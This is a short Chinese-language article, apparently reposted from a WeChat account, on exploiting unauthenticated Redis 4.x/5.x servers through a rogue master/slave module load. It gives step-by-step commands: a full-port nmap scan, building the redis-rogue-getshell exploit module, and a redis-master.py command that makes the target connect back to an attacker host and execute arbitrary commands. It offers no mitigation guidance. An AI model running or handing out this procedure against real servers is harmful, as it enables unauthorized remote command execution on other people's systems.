搜文章
推荐 原创 视频 Java开发 iOS开发 前端开发 JavaScript开发 Android开发 PHP开发 数据库 开发工具 Python开发 Kotlin开发 Ruby开发 .NET开发 服务器运维 开放平台 架构师 大数据 云计算 人工智能 开发语言 其它开发
Lambda在线 > 黑白之道 > Redis 4.x/5.x 未授权访问漏洞

Redis 4.x/5.x 未授权访问漏洞

黑白之道 2020-06-28


Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。

漏洞利用

使用nmap对目标主机进行端口扫描:nmap -p 1-65535 -sV 目标ip

Redis 4.x/5.x 未授权访问漏洞 

下载攻击工具:

https://github.com/vulhub/redis-rogue-getshell

解压压缩包进入文件夹,在文件夹内打开终端,cd RedisModulesSDK/ 进入RedisModulesSDK文件夹,make 编译工具。

Redis 4.x/5.x 未授权访问漏洞 

返回上一级文件夹,输入命令:python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "id" 成功执行了id命令


Redis 4.x/5.x 未授权访问漏洞

Redis 4.x/5.x 未授权访问漏洞


推荐文章++++

Redis 4.x/5.x 未授权访问漏洞

*

*

*


版权声明:本站内容全部来自于腾讯微信公众号,属第三方自助推荐收录。《Redis 4.x/5.x 未授权访问漏洞》的版权归原作者「黑白之道」所有,文章言论观点不代表Lambda在线的观点, Lambda在线不承担任何法律责任。如需删除可联系QQ:516101458

文章来源: 阅读原文

相关阅读

关注黑白之道微信公众号

黑白之道微信公众号:i77169

黑白之道

手机扫描上方二维码即可关注黑白之道微信公众号

黑白之道最新文章

精品公众号随机推荐